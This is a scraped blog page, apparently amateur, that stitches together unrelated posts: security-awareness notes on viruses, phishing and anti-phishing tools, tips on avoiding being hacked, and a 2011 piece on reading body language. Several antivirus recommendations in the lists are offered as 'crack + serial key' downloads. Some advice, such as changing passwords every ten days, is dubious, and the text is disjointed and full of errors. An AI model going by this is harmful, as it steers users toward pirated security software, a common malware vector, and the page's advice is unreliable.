  • Computer's hard drive constantly runs out of free space 
  • Files have strange names which are not recognizable 
  • Resources are used up easily

HARDWARE ATTACKS ::
                     Power Faults    :: Sudden power failure, voltage spikes & cause damage to system
                     System Life     :: System gets worn-out over period of time
                     Typos                      :: Data gets deleted or corrupted or replacement of wrong files

SOFTWARE ATTACKS ::
                                                                                         Intentionally launched malicious programs enable the attacker to use the computer in an unauthorized manner
                     General Categories  :: Virus and Worms
                                                                  Logic bombs
                                                                  Trojans

VRIUS DETECTION METHODS ::
                            Scanning   :: Once a virus has been detected, it is possible to write scanning programs that look for signature string characteristics of the virus
                            Integrity Checking :: Integrity checking products work by reading your entire disk and recording integrity data that acts as a signature for the files and system sectors
                            Interception :: The interception monitors operating system requests that write to disk

ANTI TOOLS - ANTI - VIRUS SOFTWARES ::
Use the following anti virus to be saved from virus and worms
  
   AVG Antivirus :: Download => AVG antivirus crack + serial key
   Norton Antivirus :: Download => Norton antivirus crack + serial key
   Avast Antivirus :: Download => Avast antivirus crack + serial key
   AntiVir Personal Edition :: Download => Anti Vir Personal Edition crack + serial key
   Kaspersky internet security :: Download => Kaspersky internet secruity crack + serial key
                   
NOTE ::  Scan your computer every after 15 day of the month

CounterMeasures for PHISHING attack


SOME ANTI TOOLS TO BE SAFE FORM BEING HACKED


Phishing ATTACKS ::  Phishing is an Internet scam where the user is convinced to give valuable information.
                     Phishing will redirect the user to a different website through emails, instant messages, spyware etc.

Process of phishing ::
  1.   The Process involves 
  2.   Registering a fake domain name 
  3.   Building a look alike website 
  4.   Sending emails to many users


Use ANTI Phishing Tools

               PhishTank SiteChecker :: It blocks the phishing pages
               NetCraft :: NetCraft tool alerts the user when connected to the phishing site
               TrustWatcher Toolbar :: TrustWatch performs a trusted search with built in search box.
               Spyware Doctor :: Spyware Doctor is an adware and spyware utility which identifies and clears many potential adware, trojans, keyloggers, spyware and other malware of the system.
               Email-Tag.com :: Email-Tag.com is used to protect the email accounts, protect the computer and hide the email address


FACEBOOK PHISHING PAGE ::


The FB Starter website duplicates the Facebook home page and is promoted by fake messages from your friends’ accounts that have already been hacked by the phishers.
This Facebook phishing attack is brought to you by the same bad guys who promoted fbaction.net and kromked.net. There will undoubtedly be more phishing attacks in the days and months ahead.



CounterMeasures from being HACKED


HOW TO NOT GET HACKED

  •     Switch to updated web browsers :: Try to work on updated browser like Firefox, Google Chrome or anything but be away from Internet Explorer :: add more security through web browser.

  •     Never click on links in email, almost ever :: Whenever possible try NOT to click on any links in email, especially since links are themselves are dangerous and phishing emails are difficult to spot.

  •     Changer your password :: Change your password every after 10 days of 15 days :: This will more good for you to be safe and try to keep strong password ::

  •     How to keep STRONG PASSWORD :: Try to use full keyboard means use alphabets, numbers and characters :: Use capital letters too :: for example P.r.#.a.S.O.$.o.n

  •     Use updated and strong ANTIVIRUS :: Try to use Strong and updated antivirus ::: Keep update every time :: If you do not have internet at home try to use that antivirus that provide updates (just search on GOOGLE)
                             LIST of Best Antivirus are

  1. Norton antivirus (updates provided on net)  :: Download  => norton antivirus with serial key + crack
  2. AVG antivirus :: Download => AVG cracke +serial key
  3. Boot minder
  4. panda Active Scan 
  5. Avast active scan :: Download => Avast internet security crack + serial key
  6. Spyware doctor :: Download => Spyware Doctor crack+ serial key


  •     USB security :: Use USB security software to be safe from virus, threats and usb hacking
                       Software recommended ::: USB Disk Security   ::: Download => USB security software crack + serial key

How to read a person like a BOOK (cont'd)

Sunday 5 June 2011

GESTURES :: The most Important PART to read the person.

              The understanding of gestures is very difficult when the various elements are separated from context. However, when gestures are fitted together into their composite positions, a complete picture evolves.

Every GESTURE is like a word in a language.

  • Reading body language gives you insights into whether or not someone is telling the truth? True or False
  • Since nonverbal communication is between 60 to 75% of the impact of a message, you could use the power of body language to become tremendously successful..
Understanding congruency of gestures serves as a monitoring device for discovering a person's attitude and then giving his actions meaning. It servers as ab "anti-assumption" control that forces us to observe.


How to read a person like a BOOK

LIFE :: True testing Ground

For READING GESTURES  :::: A man standing in the telephone booths. See the man standing with his body at attention. His coat is buttoned. He gives the impression that whoever he is talking with his to is very important to him. He might be salesman talking to a customer on the telephone as if he were actually in his presence..


If the MAN is relaxed, he slouches over, shifts his weight from foot to foot and rests his chin on his chest. He appears to be looking at the floor and nods his heads as is saying, "Haan Haan", "acha acha". Reading this person further, you get impression that he is comfortable but possible bored with conversion. THE RECEIVER OF THE CALL CAN BE TAKEN FOR GRANTED IT''S probably his wife or boring friend .